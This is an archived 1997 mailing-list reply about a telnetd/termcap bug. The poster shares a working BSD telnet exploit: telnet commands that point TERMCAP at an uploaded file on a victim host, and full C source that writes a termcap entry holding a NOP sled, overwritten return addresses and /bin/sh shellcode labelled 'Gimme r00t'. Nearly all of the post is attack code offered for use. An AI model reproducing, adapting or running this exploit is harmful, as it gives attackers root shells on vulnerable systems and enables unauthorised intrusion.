Re: in.telnetd bug (linux)

From: John Brahy (jbrahyat_private)
Date: Mon Dec 01 1997 - 06:24:55 PST

Next message: Patrick: "Re: in.telnetd bug (linux)"

Next in thread: Patrick: "Re: in.telnetd bug (linux)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

There is a BSD exploit that works on the termcap file. it has some entries
like this.

 telnet> env def TERM access
 telnet> env def TERMCAP /path/and/name/of/uploaded/file
 telnet> open victim.host.com

and the source code is here:
--------SNIP-----

#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "./termcap"
#define entry   "access|Gimme r00t:\\\n :"
#define bufsize 1300
#define default_offset 870    /* Should work...*/

char shellcode[] =
   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";

long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[]) {
   int i, fd, offs;
   long *bof_ptr;
   char *ptr, *buffer, *tempbuf;

   offs = default_offset;

   if(argc == 2) {
      printf("using offset: %d\n",atoi(argv[1]));
      offs = atoi(argv[1]);
   }

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }


  if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   bof_ptr = (long *)buffer;
   for (i = 0; i < bufsize - 4; i += 4)
      *(bof_ptr++) = get_sp() - offs;

   ptr = (char *)buffer;
   for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
      *(ptr++) = 0x90;

   for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

   printf("Creating termcap file\n");

   snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry,
buffer);
   fd = open(filename, O_WRONLY|O_CREAT, 0666);
   write (fd, tempbuf, strlen(tempbuf));
   close(fd);
}

--------SNIP------------

PEOPLE who actually wrote this:

Bug originally discovered by Theo de Raadt <deraadtat_private>
BSDI BSD/OS 2.1 telnet-exploit
Written by Joseph_K the 22-Oct-1997
Original shellcode by mudgeat_private but modified a tiny bit...
 _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _
:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:
                _  _ _  _ _       ___  ____ _ _ _
                |\ | |\ | |    __ |__] |    | | |
                | \| | \| |___    |    |___ |_|_|

_________________________________________________________________
                                /
John Brahy, CNA                /
DeVry Institute of Techonolgy /             Long Beach, California
Computer Information Systems /  mailto://jbrahyat_private
 _   _   _   _   _   _   _  /_   _   _   _   _   _   _   _   _   _
:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:

Next message: Patrick: "Re: in.telnetd bug (linux)"
Next in thread: Patrick: "Re: in.telnetd bug (linux)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:33:55 PDT